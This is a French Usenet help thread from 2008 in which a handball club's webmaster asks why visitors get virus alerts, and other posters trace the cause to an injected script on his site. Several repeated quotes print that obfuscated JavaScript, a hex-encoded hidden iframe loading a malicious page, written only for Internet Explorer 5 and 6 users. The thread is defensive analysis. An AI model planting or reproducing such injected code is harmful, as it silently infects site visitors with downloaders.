Depuis quelques temps certaines personnes me signale un virus à l'ouverture
du site web de mon club de handball. Norton ne me signal rien de particulier
sur mon PC et un scan en ligne ne detecte rien non plus.
Le virus detecté par Trend micro serai : Mal_Hifrm-2. Mon hébergeur ne
trouve rien non plus (1and1)Je ne comprend pas comment cela est possible.
Merci de m'eclairer et de me faire connaitre la marche à suivre.
http://www.pochandball.info/
*Bonjour Az Sam* Tu as pianoté sur ton clavier dans <news:48ee1011$0$964$ pour écrire ceci :
static.html est genéré par www.ppv-sex.com/z/static.php dont mon Ie6 bloque le cookie.
Et Norton y détecte le même troyen Downloader. -- Jacquouille la Fripouille Périgord, meitat chen, meitat porc.
Depassage
Az Sam wrote:
"Depassage" a écrit dans le message de news: 48ee310e$0$7935$
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Je verrais ca ce week end avec le reste :-) Mais j'ai une piste du pourquoi je ne vois rien.
Le site xxx.ppv-sex.com/z/static.php est bloqué dans mon host via mes listes, je l'avais oublié celui là (d'habitude pour les tests je le désactive mais j'étais un peu pressé et j'ai oublié de suivre mon protocole de tests :-)
Donc du coup je comprend qu'antivir dans la vm et bitdefender dans la sandbox ne crient pas :-)
Si ca ne télécharge rien de ton coté, c'est que le site est down ou a bougé (ou alimenté par un botnet qui n'est plus) On voit meme des sites crées spécialement avec une facade classique (quoique la vu le nom...) et qui ne sont là que pour infecter
Tiens d'ailleurs faire une recherche DNS sur le site :-) surprise
Az Sam wrote:
"Depassage" <monadresseamoi@hotmail.com> a écrit dans le message de
news: 48ee310e$0$7935$7a628cd7@news.club-internet.fr...
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Je verrais ca ce week end avec le reste :-) Mais j'ai une piste du
pourquoi je ne vois rien.
Le site xxx.ppv-sex.com/z/static.php est bloqué dans mon host via mes
listes, je l'avais oublié celui là (d'habitude pour les tests je le
désactive mais j'étais un peu pressé et j'ai oublié de suivre mon
protocole de tests :-)
Donc du coup je comprend qu'antivir dans la vm et bitdefender dans la
sandbox ne crient pas :-)
Si ca ne télécharge rien de ton coté, c'est que le site est down ou a
bougé (ou alimenté par un botnet qui n'est plus)
On voit meme des sites crées spécialement avec une facade classique
(quoique la vu le nom...) et qui ne sont là que pour infecter
Tiens d'ailleurs faire une recherche DNS sur le site :-) surprise
"Depassage" a écrit dans le message de news: 48ee310e$0$7935$
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Je verrais ca ce week end avec le reste :-) Mais j'ai une piste du pourquoi je ne vois rien.
Le site xxx.ppv-sex.com/z/static.php est bloqué dans mon host via mes listes, je l'avais oublié celui là (d'habitude pour les tests je le désactive mais j'étais un peu pressé et j'ai oublié de suivre mon protocole de tests :-)
Donc du coup je comprend qu'antivir dans la vm et bitdefender dans la sandbox ne crient pas :-)
Si ca ne télécharge rien de ton coté, c'est que le site est down ou a bougé (ou alimenté par un botnet qui n'est plus) On voit meme des sites crées spécialement avec une facade classique (quoique la vu le nom...) et qui ne sont là que pour infecter
Tiens d'ailleurs faire une recherche DNS sur le site :-) surprise
Cyrius
On Thu, 9 Oct 2008 21:00:06 +0200, "Az Sam" wrote:
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Mais si, Avira trouve ceci :
JS/Dldr.Iframe.BY
D'ailleurs, si on affiche le code source de la page en question et qu'on le sauve sous forme de fichier sur disque, le fichier pèse près 2,5 Mo... en demandant à Avira de scanner ce fichier sauvegardé, il trouve de nouveau la même chose.
Je ne peux pas envoyer ce fichier à VirusTotal car je n'y ai plus accès :-))) (rien à voir avec cette infection)
On Thu, 9 Oct 2008 21:00:06 +0200, "Az Sam" <me@home.net> wrote:
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Mais si, Avira trouve ceci :
JS/Dldr.Iframe.BY
D'ailleurs, si on affiche le code source de la page en question et
qu'on le sauve sous forme de fichier sur disque, le fichier pèse près
2,5 Mo... en demandant à Avira de scanner ce fichier sauvegardé, il
trouve de nouveau la même chose.
Je ne peux pas envoyer ce fichier à VirusTotal car je n'y ai plus
accès :-))) (rien à voir avec cette infection)
On Thu, 9 Oct 2008 21:00:06 +0200, "Az Sam" wrote:
Ce qui m'ettonne, c'est que toi et Cyrius n'avez rien trouver.
Mais si, Avira trouve ceci :
JS/Dldr.Iframe.BY
D'ailleurs, si on affiche le code source de la page en question et qu'on le sauve sous forme de fichier sur disque, le fichier pèse près 2,5 Mo... en demandant à Avira de scanner ce fichier sauvegardé, il trouve de nouveau la même chose.
Je ne peux pas envoyer ce fichier à VirusTotal car je n'y ai plus accès :-))) (rien à voir avec cette infection)
Cyrius
On Fri, 10 Oct 2008 09:05:45 +0200, Cyrius wrote:
Je ne peux pas envoyer ce fichier à VirusTotal car je n'y ai plus accès :-)))
Après passage du code source de la page dans un éditeur hex (UltraEdit) et élimination des lignes inutiles, je me retrouve avec un fichier de 630 octects, le voici :
-------------------- <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if ((v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1) && v.indexOf('msie 7.') == -1 && v.indexOf('nt 6.') = -1){document.write(unescape(o));}</script> href="1.html">Skip</a></td></tr></table></body></html> ---------------------
C'est ces lignes qui font réagir Avira et quelques autres av :
On Fri, 10 Oct 2008 09:49:30 +0200, Cyrius <Cyrius@belgacom.net>
wrote:
Voici :
La suite :-)
Après passage du code source de la page dans un éditeur hex
(UltraEdit) et élimination des lignes inutiles, je me retrouve avec un
fichier de 630 octects, le voici :
--------------------
<script> var
s='3C696672616D65207372633D22687474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E';
var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);
o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if
((v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1) &&
v.indexOf('msie 7.') == -1 && v.indexOf('nt 6.') = -1){document.write(unescape(o));}</script>
href="1.html">Skip</a></td></tr></table></body></html>
---------------------
C'est ces lignes qui font réagir Avira et quelques autres av :
Après passage du code source de la page dans un éditeur hex (UltraEdit) et élimination des lignes inutiles, je me retrouve avec un fichier de 630 octects, le voici :
-------------------- <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if ((v.indexOf('msie 6.0') != -1 || v.indexOf('msie 5.') != -1) && v.indexOf('msie 7.') == -1 && v.indexOf('nt 6.') = -1){document.write(unescape(o));}</script> href="1.html">Skip</a></td></tr></table></body></html> ---------------------
C'est ces lignes qui font réagir Avira et quelques autres av :
